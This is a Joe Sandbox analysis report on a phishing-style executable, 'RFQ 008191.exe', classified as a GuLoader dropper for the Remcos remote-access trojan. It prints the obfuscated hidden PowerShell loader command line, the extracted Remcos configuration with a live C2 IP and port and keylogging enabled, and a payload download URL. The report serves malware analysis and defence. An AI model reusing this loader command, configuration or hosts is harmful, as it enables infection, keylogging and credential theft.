Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 008191.exe

Overview

General Information

Sample name:RFQ 008191.exe
Analysis ID:1572498
MD5:82ba32e4800897e8bafb32990d29f60a
SHA1:21b724df29b7ddbcd88849e7ad6ab12a4d266c4c
SHA256:777441225b9d294baca2f689286a1f70a0fc28007e86cf1cc099c71ee1d826f2
Tags:exeuser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ 008191.exe (PID: 820 cmdline: "C:\Users\user\Desktop\RFQ 008191.exe" MD5: 82BA32E4800897E8BAFB32990D29F60A)
    • powershell.exe (PID: 1264 cmdline: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Juryen.exe (PID: 7864 cmdline: "C:\Users\user~1\AppData\Local\Temp\Juryen.exe" MD5: 82BA32E4800897E8BAFB32990D29F60A)
        • Juryen.exe (PID: 8032 cmdline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj" MD5: 82BA32E4800897E8BAFB32990D29F60A)
        • Juryen.exe (PID: 8040 cmdline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx" MD5: 82BA32E4800897E8BAFB32990D29F60A)
        • Juryen.exe (PID: 8056 cmdline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa" MD5: 82BA32E4800897E8BAFB32990D29F60A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000006.00000002.1771671696.0000000009BD8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: Juryen.exe PID: 7864JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 2 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 008191.exe", ParentImage: C:\Users\user\Desktop\RFQ 008191.exe, ParentProcessId: 820, ParentProcessName: RFQ 008191.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), ProcessId: 1264, ProcessName: powershell.exe
              Sigma detected: Use Short Name Path in Command Line
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 008191.exe", ParentImage: C:\Users\user\Desktop\RFQ 008191.exe, ParentProcessId: 820, ParentProcessName: RFQ 008191.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), ProcessId: 1264, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 008191.exe", ParentImage: C:\Users\user\Desktop\RFQ 008191.exe, ParentProcessId: 820, ParentProcessName: RFQ 008191.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), ProcessId: 1264, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Juryen.exe, ProcessId: 7864, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:29:02.256338+010020365941Malware Command and Control Activity Detected192.168.2.749793212.162.149.912404TCP
              2024-12-10T16:29:04.459493+010020365941Malware Command and Control Activity Detected192.168.2.749799212.162.149.912404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:29:04.654488+010028033043Unknown Traffic192.168.2.749801178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:28:58.760234+010028032702Potentially Bad Traffic192.168.2.749784212.162.149.8980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeReversingLabs: Detection: 18%
              Multi AV Scanner detection for submitted file
              Source: RFQ 008191.exeReversingLabs: Detection: 18%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: RFQ 008191.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,13_2_00404423
              Source: RFQ 008191.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: RFQ 008191.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000006.00000002.1770161341.000000000824C000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C4D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_0040689E FindFirstFileW,FindClose,11_2_0040689E
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F7510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_1F7510F1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F756580 FindFirstFileExA,11_2_1F756580
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49793 -> 212.162.149.91:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49799 -> 212.162.149.91:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 212.162.149.91
              Source: global trafficTCP traffic: 192.168.2.7:49793 -> 212.162.149.91:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49784 -> 212.162.149.89:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49801 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /wwVHOGRH148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89
              Source: global trafficHTTP traffic detected: GET /wwVHOGRH148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Juryen.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Juryen.exe, 0000000B.00000002.2542497017.000000001F630000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Juryen.exe, 0000000B.00000002.2542497017.000000001F630000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Juryen.exe, 0000000B.00000002.2528621890.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/wwVHOGRH148.bin
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/wwVHOGRH148.bins
              Source: bhvA440.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvA440.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvA440.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvA440.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvA440.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: RFQ 008191.exe, Juryen.exe.6.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvA440.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: Juryen.exe, Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
              Source: Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
